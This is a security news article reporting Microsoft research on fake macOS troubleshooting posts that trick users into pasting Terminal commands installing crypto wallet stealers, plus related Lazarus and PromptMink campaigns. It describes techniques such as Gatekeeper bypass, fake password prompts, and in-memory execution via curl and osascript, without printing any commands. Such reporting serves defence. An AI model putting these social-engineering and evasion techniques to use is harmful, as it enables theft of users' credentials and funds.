Fake macOS troubleshooting posts are being used to trick users into running Terminal commands that install crypto wallet stealers, according to Microsoft’s Defender Security Research Team.
The campaign has been active since late 2025 and targets people searching for help with storage issues and system errors. Instead of delivering advice, the pages push commands that download malware and expose iCloud data, saved passwords, private files, and wallet keys.
Fake Fixes Turn Terminal Into an Attack Route
The fake guides appear on platforms including Medium, Craft, and Squarespace, where attackers present harmful commands as repair steps. Readers are told to copy and paste code into Terminal, and that action starts the malware installation process without a normal app download.
Researchers described the method as ClickFix, a social engineering tactic that makes the victim launch the payload. Since the command runs directly inside Terminal, macOS Gatekeeper does not review it like an app opened through Finder. Gatekeeper usually checks code signing and notarization, but this attack avoids that path.
Apple has added a protection in macOS 26.4 that warns users when they try to paste commands flagged as potentially malicious into Terminal. The change targets the exact behavior that ClickFix attacks rely on, although users still need to treat copied commands with caution.
Stealers Target Wallets, Passwords, and Private Files
Microsoft identified three related installer campaigns using a loader, a script, and a helper. Each version gathers sensitive data, creates persistence, and sends stolen information to attacker-controlled servers.
The malware families include AMOS, Macsync, and SHub Stealer. Once active, they search for iCloud and Telegram account data, private documents, small photos, browser usernames, and saved passwords. They also target crypto wallet keys linked to Exodus, Ledger, and Trezor.
The malware can display a fake system prompt that asks for a password to install a helper tool. If the user enters the password, attackers gain broader access to files and system settings. In some cases, researchers found that legitimate wallet apps were removed and replaced with trojanized versions that monitor transactions and steal funds.
Crypto Developers Face Wider Threats
The loader campaign also contains a kill switch that stops execution when it detects a Russian keyboard layout. Researchers also observed native macOS utilities such as curl and osascript being used to run payloads in memory, which can reduce visible file activity.
The threat extends beyond fake troubleshooting pages. ANY.RUN researchers linked a Lazarus Group operation called Mach O Man to ClickFix-style lures using fake meeting invitations aimed at fintech and crypto users. Another campaign, PromptMink, showed how attackers used an AI-generated code change and a malicious npm package inside a crypto trading project to reach wallet data and system secrets.
